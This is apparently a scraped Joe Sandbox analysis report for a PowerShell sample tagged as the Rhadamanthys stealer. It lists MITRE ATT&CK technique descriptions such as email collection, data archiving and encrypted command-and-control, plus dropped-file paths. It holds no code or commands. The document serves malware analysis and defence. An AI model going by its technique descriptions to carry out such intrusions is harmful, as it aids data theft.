Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report atomxml.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_e703175c-856a-4b57-b870-b529f490df7e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_9bb339a58ff9b4412d9b734fd588f7f44673659_00000000_f367fb30-4a6d-4729-a18a-0a24b90a8c50\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_598857dc-8512-453a-af65-151ce81ace18\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_de2cba4fb6d07d9ffa5fcfac6871b6b3655c61d4_00000000_e0ec688a-ee3f-4ab9-b88a-f6cbb51d4565\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAD9.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD2B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD4B.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE54.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE65.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE93.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFED1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF01.tmp.xml

C:\ProgramData\nippleskulcha\aksodkaosdwwkkw.~!!@@!!@!!!!!!@!@@!!@@!@@!!@@!!~

Windows Analysis Report
atomxml.ps1

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre